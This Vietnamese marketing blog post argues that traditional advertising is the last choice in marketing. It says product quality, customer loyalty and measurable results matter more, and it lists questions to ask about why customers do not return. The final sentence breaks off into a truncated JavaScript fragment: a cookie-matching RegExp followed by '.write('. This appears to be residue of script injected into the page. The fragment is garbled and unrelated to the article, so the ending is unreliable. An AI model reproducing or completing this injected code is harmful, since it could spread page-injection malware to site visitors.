Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Website Marketing > Sự lựa chọn cuối cùng trong marketing

Sự lựa chọn cuối cùng trong marketing

Đó là quảng cáo (truyền thống)!

Bạn sẽ có thể nhìn nhận khác đi, nhưng nhân tố giúp tìm ra khách hàng nhiều hơn và nhiều hơn lại nằm ở chỗ sản phẩm tạo ra lòng trung thành.

Một người làm marketing hảo hạng sẽ cùng vận hành một công ty có sản phẩm hoặc dịch vụ hảo hạng và khiến cho mọi người biết về nó không thông qua quảng cáo. Điều này có thể cần kiểm chứng, nhưng bạn sẽ có thể tự trải nghiệm hoặc đơn giản hơn là nghĩ lại xem bạn hay ăn những món mà bạn thích ở đâu, hay đến những chỗ nào để la cà và bỏ tiền, hay mua những sản phẩm ở đâu và hay dùng quần áo mua ở cửa hàng nào… VÀ HỌ CÓ QUẢNG CÁO HAY KHÔNG?

Tất nhiên có thể có, nhưng cũng rất nhiều khả năng là không. Có vẻ chính bạn cũng đang được mọi người giới thiệu cho nhau đến đó mua hàng hoặc bằng cách nào đó bạn tìm thấy cửa hàng đó bán các sản phẩm phù hợp với nhu cầu của mình thông qua internet!

Sự lựa chọn cuối cùng trong marketing?

Thông thường nhiều người sẽ cho rằng các loại hình quảng cáo sẽ tác động đến doanh thu của mình rất lớn, nhưng cần xem xét lại và tìm ra một cách thức nào đó để đo đếm quảng cáo nếu như nó chỉ giúp cho bạn gây ra được một chút ồn ảo hay tò mò hoặc chỉ chiếm một ít ánh nhìn của khách hàng trên con đường quen thuộc… Và đó chỉ là cảm tính, không có đo đếm lý tính ở đây.

Hãy nghe và nghĩ thật kỹ về những câu nói quen thuộc sau đây:

 • Chúng tôi đang cố gắng cải thiện kết quả quảng cáo…
 • Hàng triệu người đã nhìn thấy quảng cáo của bạn và biết đến thương hiệu của bạn…
 • Quảng cáo có tính tích luỹ, vì vậy tốt nhất không nên ngừng quảng cáo…

Vậy hãy nghĩ thật kỹ xem cái mà quảng cáo đang được cải thiện là gì, ai nhìn thấy và họ nhìn thấy gì hoặc là quảng cáo tích luỹ được cái gì?

Rất nhiều người đang cho rằng, tích luỹ đó chính là tích luỹ thương hiệu, khi người mua có nhu cầu họ sẽ nhớ đến mình và đi mua! Thật sự thì họ có làm như vậy không? Hay họ sẽ nhấc điện thoại lên và hỏi quách người bạn có kinh nghiệm của họ?

Tạo ra khách mới và họ không trung thành

Đó thực sự là một kết quả thê thảm với người làm marketing, nó không chỉ là sản phẩm thê thảm, nó còn là sự thê thảm mang tính tự tôn cá nhân. Hãy hỏi mấy câu theo kiểu có – không để xem vì sao họ không trung thành:

 • Có phải sản phẩm kém quá?
 • Có phải bạn khó ưa?
 • Có phải họ chỉ thèm muốn cái khuyến mại được quảng cáo?
 • Có phải họ chỉ là kiểu chán cơm thèm phở đến với bạn một hôm rồi lại về với cơm?
 • Có phải bạn không tạo ra ấn tượng tốt đẹp?
 • Có phải bạn không đáng tin?
 • Họ bỏ đi vì bạn là loại “vỉa hè mà đòi giá cao”?
 • Có phải bạn có sản phẩm tốt nhưng lại không giải thích nổi cho khách hàng?

Ôi…

Mỗi cái trả lời “có” là một núi các vấn đề cần giải quyết. Nhưng không phải là quảng cáo nhiều hơn! Bạn có thể thấy rõ như vậy khi nghĩ và trả lời từng câu hỏi trên, kể cả bằng lý trí lẫn tình cảm.

Người làm marketing tốt là người làm cho mọi công việc của mình được tối ưu cả về chi phí và hiểu quả. Tất nhiên, phải đo đếm được, không phải cảm tính! Và thông thường, các loại hình quảng cáo truyền thống có vẻ là lựa chọn cuối cùng mà người làm marketing nên nghĩ đến. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘